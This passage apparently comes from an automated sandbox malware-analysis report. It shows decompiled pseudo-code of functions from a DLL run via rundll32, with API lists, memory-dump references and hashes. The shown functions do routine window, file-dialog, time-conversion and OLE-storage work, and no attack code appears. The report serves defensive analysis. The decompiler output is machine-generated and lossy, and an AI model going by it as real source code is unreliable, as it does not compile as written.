						_t88 = 0;
					}
					_t68 = E100220EE(_t90, GetCapture());
					if(_t68 != _t89) {
						if(_t68 != 0) {
							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
						} else {
							_t83 = 0;
						}
						if(_t83 != _t88 && E10023092(_t68) == _t74) {
							_v8 = _v8 | 0xffffffff;
						}
					}
				}
				if(_v8 < 0) {
					L25:
					if( *(_v12 + 0x78) == 0xffffffff) {
						KillTimer( *(_t89 + 0x1c), 0xe001);
					}
					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
					goto L28;
				} else {
					ClientToScreen( *(_t89 + 0x1c),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							L28:
							_t53 = 0xe000;
							if(_a4 == 0xe000) {
								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
								if(_v8 >= 0) {
									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
								}
							}
							return _t53;
						}
						goto L25;
					}
					_t60 =  *(_t89 + 0x1c);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t87) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
			}






















                                                                        0x1002f50b
                                                                        0x1002f50d
                                                                        0x1002f516
                                                                        0x1002f660
                                                                        0x1002f660
                                                                        0x1002f523
                                                                        0x1002f529
                                                                        0x1002f52c
                                                                        0x1002f539
                                                                        0x1002f54b
                                                                        0x1002f550
                                                                        0x1002f553
                                                                        0x1002f5b6
                                                                        0x1002f555
                                                                        0x1002f55e
                                                                        0x1002f567
                                                                        0x1002f574
                                                                        0x1002f574
                                                                        0x1002f578
                                                                        0x1002f57d
                                                                        0x1002f583
                                                                        0x1002f57f
                                                                        0x1002f57f
                                                                        0x1002f57f
                                                                        0x1002f58d
                                                                        0x1002f594
                                                                        0x1002f598
                                                                        0x1002f59e
                                                                        0x1002f59a
                                                                        0x1002f59a
                                                                        0x1002f59a
                                                                        0x1002f5a3
                                                                        0x1002f5b0
                                                                        0x1002f5b0
                                                                        0x1002f5a3
                                                                        0x1002f594
                                                                        0x1002f5c4
                                                                        0x1002f61a
                                                                        0x1002f621
                                                                        0x1002f62b
                                                                        0x1002f62b
                                                                        0x1002f633
                                                                        0x00000000
                                                                        0x1002f5c6
                                                                        0x1002f5cd
                                                                        0x1002f5d3
                                                                        0x1002f5df
                                                                        0x1002f5e3
                                                                        0x1002f609
                                                                        0x1002f609
                                                                        0x1002f60c
                                                                        0x1002f610
                                                                        0x1002f614
                                                                        0x1002f618
                                                                        0x1002f639
                                                                        0x1002f639
                                                                        0x1002f641
                                                                        0x1002f647
                                                                        0x1002f64d
                                                                        0x1002f656
                                                                        0x1002f656
                                                                        0x1002f64d
                                                                        0x00000000
                                                                        0x1002f65d
                                                                        0x00000000
                                                                        0x1002f618
                                                                        0x1002f5e5
                                                                        0x1002f5ea
                                                                        0x00000000
                                                                        0x1002f5f8
                                                                        0x1002f5fb
                                                                        0x1002f600
                                                                        0x1002f602
                                                                        0x1002f602
                                                                        0x1002f607
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002f607
                                                                        0x1002f5ea

                                                                        APIs
                                                                        • GetKeyState.USER32 ref: 1002F50D
                                                                        • GetCursorPos.USER32(?), ref: 1002F52C
                                                                        • ScreenToClient.USER32 ref: 1002F539
                                                                        • GetCapture.USER32 ref: 1002F586
                                                                          • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                        • ClientToScreen.USER32(?,?), ref: 1002F5CD
                                                                        • WindowFromPoint.USER32(?,?), ref: 1002F5D9
                                                                        • IsChild.USER32 ref: 1002F5EE
                                                                        • KillTimer.USER32(?,0000E001), ref: 1002F62B
                                                                        • KillTimer.USER32(?,0000E000), ref: 1002F647
                                                                          • Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
                                                                          • Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                        • String ID:
                                                                        • API String ID: 1383385731-0
                                                                        • Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                        • Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
                                                                        • Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                        • Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001CE8D Relevance: 13.6, APIs: 9, Instructions: 85windowstringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E1001CE8D() {
				int _v4;
				struct HWND__* _v8;
				void* __ecx;
				int _t30;
				intOrPtr _t36;
				int _t40;
				int _t41;
				int _t43;
				void* _t44;
				void* _t52;
				signed int _t54;
				void* _t64;
				signed int _t67;

				_t67 = _t54;
				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x70)) + 0x1c));
				_t52 = 0;
				E10011C50( &(( *( *((intOrPtr*)(_t67 + 0x70)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x70)) + 0x20)) - _t30 + 1);
				_v8 = GetFocus();
				 *( *((intOrPtr*)(_t67 + 0x70)) + 4) = E1001EE1E(_t67);
				E10022196();
				_t36 =  *((intOrPtr*)(_t67 + 0x70));
				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
					_t52 = 1;
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x70)) + 4), 0);
				}
				_t64 = E100373A5();
				if(( *( *((intOrPtr*)(_t67 + 0x70)) + 0x36) & 0x00000008) == 0) {
					_push(_t67);
					E100237EE();
				} else {
					 *(_t64 + 0x18) = _t67;
				}
				_push( *((intOrPtr*)(_t67 + 0x70)));
				if( *((intOrPtr*)(_t67 + 0x74)) == 0) {
					_t40 = GetSaveFileNameA();
				} else {
					_t40 = GetOpenFileNameA();
				}
				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				_v4 = _t40;
				if(_t52 != 0) {
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x70)) + 4), 1);
				}
				_t41 = IsWindow(_v8);
				_t80 = _t41;
				if(_t41 != 0) {
					SetFocus(_v8);
				}
				E1001EE58(_t67, _t80);
				_t43 = _v4;
				if(_t43 == 0) {
					_t44 = 2;
					return _t44;
				}
				return _t43;
			}
















                                                                        0x1001ce92
                                                                        0x1001ce9b
                                                                        0x1001ceae
                                                                        0x1001ceb4
                                                                        0x1001cec7
                                                                        0x1001ced0
                                                                        0x1001ced3
                                                                        0x1001ced8
                                                                        0x1001cee4
                                                                        0x1001cefb
                                                                        0x1001cefc
                                                                        0x1001cefc
                                                                        0x1001cf03
                                                                        0x1001cf0c
                                                                        0x1001cf13
                                                                        0x1001cf14
                                                                        0x1001cf0e
                                                                        0x1001cf0e
                                                                        0x1001cf0e
                                                                        0x1001cf1d
                                                                        0x1001cf20
                                                                        0x1001cf2a
                                                                        0x1001cf22
                                                                        0x1001cf22
                                                                        0x1001cf22
                                                                        0x1001cf30
                                                                        0x1001cf36
                                                                        0x1001cf3a
                                                                        0x1001cf44
                                                                        0x1001cf44
                                                                        0x1001cf4a
                                                                        0x1001cf50
                                                                        0x1001cf52
                                                                        0x1001cf58
                                                                        0x1001cf58
                                                                        0x1001cf60
                                                                        0x1001cf65
                                                                        0x1001cf6f
                                                                        0x1001cf73
                                                                        0x00000000
                                                                        0x1001cf73
                                                                        0x1001cf76

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 1001CE9B
                                                                        • GetFocus.USER32 ref: 1001CEBC
                                                                          • Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB
                                                                        • IsWindowEnabled.USER32(?), ref: 1001CEE9
                                                                        • EnableWindow.USER32(?,00000000), ref: 1001CEFC
                                                                        • GetOpenFileNameA.COMDLG32(?), ref: 1001CF22
                                                                        • GetSaveFileNameA.COMDLG32(?), ref: 1001CF2A
                                                                        • EnableWindow.USER32(?,00000001), ref: 1001CF44
                                                                        • IsWindow.USER32(?), ref: 1001CF4A
                                                                        • SetFocus.USER32(?), ref: 1001CF58
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
                                                                        • String ID:
                                                                        • API String ID: 3606897497-0
                                                                        • Opcode ID: 014ad5681e902ff593bf6bf3649cb216903797f945862ce0a0fb8e4bae70e4d1
                                                                        • Instruction ID: a6979b17d14fe3184cba57d8ea26f243850ffbf7c9edf595d6d18fd7afe56fb8
                                                                        • Opcode Fuzzy Hash: 014ad5681e902ff593bf6bf3649cb216903797f945862ce0a0fb8e4bae70e4d1
                                                                        • Instruction Fuzzy Hash: 3E315675604A089FE722CF35C889E1ABBE6FF44741B10892DF5428B662DB31F896CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001328A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
							_v20 = _t138;
							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E10013780(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E10018BEF( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E100193FB(_t150, _t169);
								_t109 =  *0x1004cde8; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E100134E7(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E100134E7(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}







































                                                                        0x1001328a
                                                                        0x10013293
                                                                        0x10013295
                                                                        0x10013298
                                                                        0x10013299
                                                                        0x1001329b
                                                                        0x1001329e
                                                                        0x100132a1
                                                                        0x100134d0
                                                                        0x100134d0
                                                                        0x100134d0
                                                                        0x00000000
                                                                        0x100132b2
                                                                        0x100132b2
                                                                        0x100132b6
                                                                        0x00000000
                                                                        0x100132cc
                                                                        0x100132cc
                                                                        0x100132d1
                                                                        0x100132d8
                                                                        0x100132db
                                                                        0x100132dc
                                                                        0x100132de
                                                                        0x100132e0
                                                                        0x100132e1
                                                                        0x100132e4
                                                                        0x100132e7
                                                                        0x100132ec
                                                                        0x100132f1
                                                                        0x100132f5
                                                                        0x100132f8
                                                                        0x100132f8
                                                                        0x100132fc
                                                                        0x10013300
                                                                        0x00000000
                                                                        0x10013312
                                                                        0x10013312
                                                                        0x10013316
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013316
                                                                        0x10013327
                                                                        0x10013327
                                                                        0x10013327
                                                                        0x10013338
                                                                        0x1001333c
                                                                        0x1001333f
                                                                        0x1001334e
                                                                        0x10013371
                                                                        0x1001337d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001337f
                                                                        0x1001337f
                                                                        0x10013382
                                                                        0x10013384
                                                                        0x10013388
                                                                        0x10013388
                                                                        0x1001338c
                                                                        0x10013392
                                                                        0x10013397
                                                                        0x10013398
                                                                        0x1001339b
                                                                        0x1001339d
                                                                        0x100133aa
                                                                        0x100133ae
                                                                        0x100133b1
                                                                        0x100133bf
                                                                        0x100133c7
                                                                        0x100133ca
                                                                        0x100133cd
                                                                        0x100133de
                                                                        0x100133e4
                                                                        0x100133fb
                                                                        0x10013400
                                                                        0x1001340a
                                                                        0x10013411
                                                                        0x1001341a
                                                                        0x1001341d
                                                                        0x1001341f
                                                                        0x10013428
                                                                        0x10013434
                                                                        0x1001343a
                                                                        0x1001343e
                                                                        0x1001344a
                                                                        0x1001344d
                                                                        0x10013454
                                                                        0x10013459
                                                                        0x1001345d
                                                                        0x1001345f
                                                                        0x10013462
                                                                        0x10013464
                                                                        0x10013467
                                                                        0x1001346a
                                                                        0x1001346d
                                                                        0x100134b7
                                                                        0x100134bc
                                                                        0x100134bf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100134c1
                                                                        0x100134cb
                                                                        0x00000000
                                                                        0x100134cc
                                                                        0x1001346f
                                                                        0x10013474
                                                                        0x10013479
                                                                        0x1001347a
                                                                        0x10013481
                                                                        0x10013484
                                                                        0x1001348c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001348e
                                                                        0x10013491
                                                                        0x10013493
                                                                        0x1001349c
                                                                        0x100134a1
                                                                        0x100134a2
                                                                        0x100134a9
                                                                        0x100134ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013493
                                                                        0x1001334e
                                                                        0x100132d1
                                                                        0x100132b6

                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 10013342
                                                                        • __allrem.LIBCMT ref: 1001335A
                                                                        • __allrem.LIBCMT ref: 10013376
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4
                                                                          • Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                        • String ID: E
                                                                        • API String ID: 4106114094-3568589458
                                                                        • Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                        • Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
                                                                        • Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                        • Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000B89E Relevance: 12.3, APIs: 8, Instructions: 303memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E1000B89E(intOrPtr __ecx) {
				void* _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				void _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void _t138;
				void _t140;
				void* _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void _t148;
				void* _t150;
				intOrPtr* _t152;
				void* _t153;
				void _t157;
				void* _t158;
				void _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr* _t176;
				intOrPtr _t187;
				intOrPtr* _t207;
				void* _t211;
				void* _t226;
				void* _t227;
				void* _t228;

				E10011BF0(0x1003aeb1, _t228);
				_t176 = __ecx + 0x4c;
				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
				_t115 = E1000A2B0(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x10043068, _t176,  *(_t228 + 0x14));
				 *(_t228 + 0x14) = _t115;
				if(_t115 < 0) {
					L51:
					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
					return _t115;
				}
				 *(_t228 - 0x10) = 0;
				 *(_t228 - 0x14) = 0;
				 *((intOrPtr*)(_t228 + 8)) = 0;
				E1000A4B6(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
				if(_t119 != 0) {
					L4:
					_t226 =  *(_t228 + 0xc);
					if(_t226 == 0) {
						__eflags =  *(_t228 + 0x10);
						if( *(_t228 + 0x10) != 0) {
							L15:
							_t120 =  *_t176;
							_t211 = _t228 - 0x14;
							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x100430e8, _t211);
							__eflags = _t121;
							if(_t121 < 0) {
								L42:
								if( *(_t228 + 0x14) >= 0) {
									L45:
									_t122 =  *((intOrPtr*)(_t228 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
										 *(_t228 + 0x14) = 1;
									}
									_t115 =  *(_t228 + 0x14);
									goto L51;
								}
								L43:
								_t124 =  *_t176;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t176;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t176 = 0;
								}
								goto L45;
							}
							__eflags = _t226;
							if(_t226 != 0) {
								__eflags =  *(_t228 + 0x10);
								if( *(_t228 + 0x10) == 0) {
									 *(_t228 + 0x14) = 0x8000ffff;
									L36:
									_t128 =  *(_t228 - 0x14);
									L37:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L38:
									if( *(_t228 + 0x14) < 0) {
										goto L43;
									}
									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
										_t187 =  *((intOrPtr*)(_t228 - 0x20));
										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
											_t130 =  *_t176;
											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
										}
									}
									goto L42;
								}
								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
								__eflags = _t211;
								 *(_t228 - 0x2c) = _t133;
								if(__eflags > 0) {
									L29:
									 *(_t228 + 0x14) = 0x8007000e;
									 *(_t228 + 0x10) = 0;
									L30:
									__eflags =  *(_t228 + 0x10);
									 *(_t228 - 0x1c) = 0;
									if( *(_t228 + 0x10) == 0) {
										goto L36;
									}
									_t134 = _t228 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
									__eflags = _t134;
									 *(_t228 + 0x14) = _t134;
									if(_t134 < 0) {
										goto L36;
									}
									_t135 = _t228 - 0x18;
									 *(_t228 - 0x18) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
									__eflags = _t135;
									 *(_t228 + 0x14) = _t135;
									if(_t135 >= 0) {
										_t138 =  *(_t228 - 0x14);
										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
										_t140 =  *(_t228 - 0x18);
										 *((intOrPtr*)( *_t140 + 8))(_t140);
									}
									_t136 =  *(_t228 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t136 + 8))(_t136);
									goto L36;
								}
								if(__eflags < 0) {
									L26:
									_t142 = GlobalAlloc(0, _t133);
									__eflags = _t142;
									 *(_t228 + 0x10) = _t142;
									if(_t142 == 0) {
										goto L29;
									}
									_t143 = GlobalLock(_t142);
									__eflags = _t143;
									if(_t143 == 0) {
										goto L29;
									}
									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
									GlobalUnlock( *(_t228 + 0x10));
									goto L30;
								}
								__eflags = _t133 - 0xffffffff;
								if(_t133 >= 0xffffffff) {
									goto L29;
								}
								goto L26;
							}
							_t146 = _t228 + 0xc;
							 *(_t228 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							__eflags = _t146;
							 *(_t228 + 0x14) = _t146;
							if(_t146 < 0) {
								goto L36;
							}
							_t147 = _t228 + 0x10;
							 *(_t228 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
							__eflags = _t147;
							 *(_t228 + 0x14) = _t147;
							if(_t147 >= 0) {
								_t148 =  *(_t228 - 0x14);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
								_t150 =  *(_t228 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t136 =  *(_t228 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t176;
						_t214 = _t228 - 0x10;
						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x10043188, _t228 - 0x10);
						__eflags = _t153;
						if(_t153 < 0) {
							goto L15;
						} else {
							__eflags = _t226;
							if(__eflags != 0) {
								E1002A986(_t228 - 0x74, _t214, __eflags);
								 *(_t228 - 4) = 0;
								E1001D6AF(_t228 - 0x2c, _t228 - 0x74);
								_t157 =  *(_t228 - 0x10);
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
								_t46 = _t228 - 4;
								 *_t46 =  *(_t228 - 4) | 0xffffffff;
								__eflags =  *_t46;
								 *(_t228 + 0x14) = _t158;
								E1002A941(_t228 - 0x74, _t228 - 0x2c);
							} else {
								_t160 =  *(_t228 - 0x10);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *(_t228 - 0x10);
							goto L37;
						}
					}
					if( *(_t228 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t176;
					_push(_t228 + 8);
					_push(0x10043198);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t228 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
						_t207 =  *((intOrPtr*)(_t228 + 8));
						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t228 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t228 + 8)) = 0;
						goto L38;
					}
				}
				_t171 =  *_t176;
				_t227 = __ecx + 0x6c;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
				if(( *(_t227 + 2) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t176;
